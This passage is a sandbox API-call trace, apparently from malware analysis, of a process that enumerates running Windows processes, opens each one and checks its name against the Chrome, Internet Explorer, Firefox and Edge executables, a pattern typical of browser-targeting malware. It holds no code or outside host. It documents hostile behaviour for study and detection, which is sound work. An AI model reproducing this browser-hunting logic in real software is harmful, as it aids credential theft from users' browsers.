	[0252.432] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.432] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0252.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa5ac
	[0252.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.433] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0252.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.433] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.434] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0252.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.434] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.434] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0252.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa5b0
	[0252.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.435] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.435] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.436] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.436] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.436] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa5b4
	[0252.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.437] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.437] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.438] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.438] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa5b8
	[0252.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.439] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.439] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.440] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.440] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.440] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa5bc
	[0252.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.441] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.442] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.442] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.442] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa5c0
	[0252.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.443] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.444] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.444] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.444] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.445] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa5c4
	[0252.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.445] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.446] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.446] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.446] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.447] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa5c8
	[0252.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.448] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.448] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.448] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.449] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa5cc
	[0252.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.450] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.450] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.451] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.451] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0252.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa5d0
	[0252.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.452] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0252.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.453] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.453] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0252.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.453] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.454] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa5d4
	[0252.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.454] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.455] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.455] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.456] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0252.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa5d8
	[0252.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.457] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.457] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.457] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.458] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa5dc
	[0252.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.459] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.459] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.460] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.460] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa5e0
	[0252.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.461] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.461] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.462] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.462] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.463] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa5e4
	[0252.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.464] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.464] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.464] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.465] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0252.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa5e8
	[0252.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.466] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0252.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.466] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.466] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0252.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.467] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0252.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa5ec
	[0252.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.468] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.468] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.468] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.469] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0252.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa5f0
	[0252.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.470] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0252.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.470] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.470] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0252.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.471] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0252.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0252.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0252.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa5f4
	[0252.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.473] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0252.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.473] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.474] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0252.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.475] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0252.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa5f8
	[0252.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.476] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0252.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.476] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.477] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0252.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.477] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0252.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa5fc
	[0252.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.478] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0252.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.478] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.479] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0252.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.479] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0252.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa600
	[0252.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.480] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0252.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.480] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.481] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0252.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.481] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0252.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa604
	[0252.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.482] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0252.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.483] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.483] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0252.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.484] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0252.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa608
	[0252.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.485] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0252.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.485] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.486] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0252.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.486] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
